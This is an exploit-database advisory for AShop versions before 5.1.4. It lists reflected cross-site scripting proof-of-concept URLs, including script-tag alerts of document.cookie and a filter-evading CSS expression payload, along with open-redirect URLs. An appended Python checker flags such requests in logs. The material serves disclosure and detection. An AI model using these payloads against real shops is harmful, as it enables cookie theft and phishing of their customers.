AShop – Open Redirection / Cross-Site Scripting

  • Author: Infoserve Security Team
    Date: 2011-11-09
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/36297/
  • source: https://www.securityfocus.com/bid/50616/info
    
    AShop is prone to multiple open-redirection issues and multiple cross-site scripting issues because it fails to sufficiently sanitize user-supplied input.
    
    Attackers can exploit these issues to execute arbitrary script or HTML code, steal cookie-based authentication credentials, and conduct phishing attacks. Other attacks may also be possible.
    
    Versions prior to AShop 5.1.4 are vulnerable. 
    
    IE8
    
    http://www.example.com/ashop/?'"<script>alert(document.cookie)</script>
    http://www.example.com/ashop/index.php?'"<script>alert(document.cookie)</script>
    http://www.example.com/ashop/picture.php?picture=" stYle=x:expre/**/ssion(alert(document.cookie)) ns="
    http://www.example.com/ashop/index.php?language='"<script>alert(document.cookie)</script>
    
    FF 7.1
    
    http://www.example.com/ashop/index.php?searchstring=1&showresult=true&exp='"</script><script>alert(666);</script>&resultpage=&categories=off&msg=&search=index.php&shop=1
    http://www.example.com/ashop/catalogue.php?cat=3&exp=3&shop=3&resultpage='"</script><script>alert(document.cookie)</script>&msg=
    http://www.example.com/ashop/catalogue.php?cat=3&exp=3&shop=3&resultpage=1&msg='"</script><script>alert(document.cookie)</script>
    http://www.example.com/ashop/basket.php?cat=0&sid='"</script><script>alert(document.cookie)</script>&shop=1&payoption=3
    
    Open Redirection
    
    http://www.example.com/ashop/language.php?language=sv&redirect=http://www.google.com
    http://www.example.com/ashop/currency.php?currency=aud&redirect=http://www.google.com
    http://www.example.com/ashop/currency.php?redirect=http://www.google.com
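
An added example, not part of the original advisory or of AShop's code: a log-triage check that flags requests of the two kinds listed above (script markup in the query string, and a `redirect` parameter that points off-site). `SITE_HOST`, the function names, the patterns and the sample requests are assumptions chosen for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

SITE_HOST = "www.example.com"    # assumption: the shop's own hostname
REDIRECT_PARAMS = {"redirect"}   # parameter name used by language.php / currency.php
CSS_COMMENT = re.compile(r"/\*.*?\*/", re.S)   # undo the expre/**/ssion split
MARKUP = re.compile(r"<\s*/?\s*script|expression\s*\(", re.I)

def external_redirect(value, site_host=SITE_HOST):
    """True if following this redirect target would leave site_host."""
    target = urlsplit(value.strip().replace("\\", "/"))  # browsers treat \ as /
    if target.scheme and target.scheme.lower() not in ("http", "https"):
        return True
    host = target.hostname
    return host is not None and host.lower() != site_host.lower()

def classify(url, site_host=SITE_HOST):
    """Return the set of findings for one requested URL."""
    findings = set()
    query = urlsplit(url).query
    if MARKUP.search(CSS_COMMENT.sub("", unquote_plus(query))):
        findings.add("xss-markup")
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() in REDIRECT_PARAMS and external_redirect(value, site_host):
            findings.add("open-redirect")
    return findings

# Constructed sample requests: the first two follow shapes listed in the
# advisory, the last two are benign.
SAMPLES = [
    "http://www.example.com/ashop/currency.php?currency=aud&redirect=http://www.google.com",
    "http://www.example.com/ashop/catalogue.php?cat=3&resultpage=%27%22%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E",
    "http://www.example.com/ashop/currency.php?currency=aud&redirect=index.php",
    "http://www.example.com/ashop/catalogue.php?cat=3&exp=3&shop=3&resultpage=1",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(sorted(classify(url)) or "clean", url)
```

The same `external_redirect` test can sit in front of the redirect itself, rejecting any target that is not a path on the shop's own host.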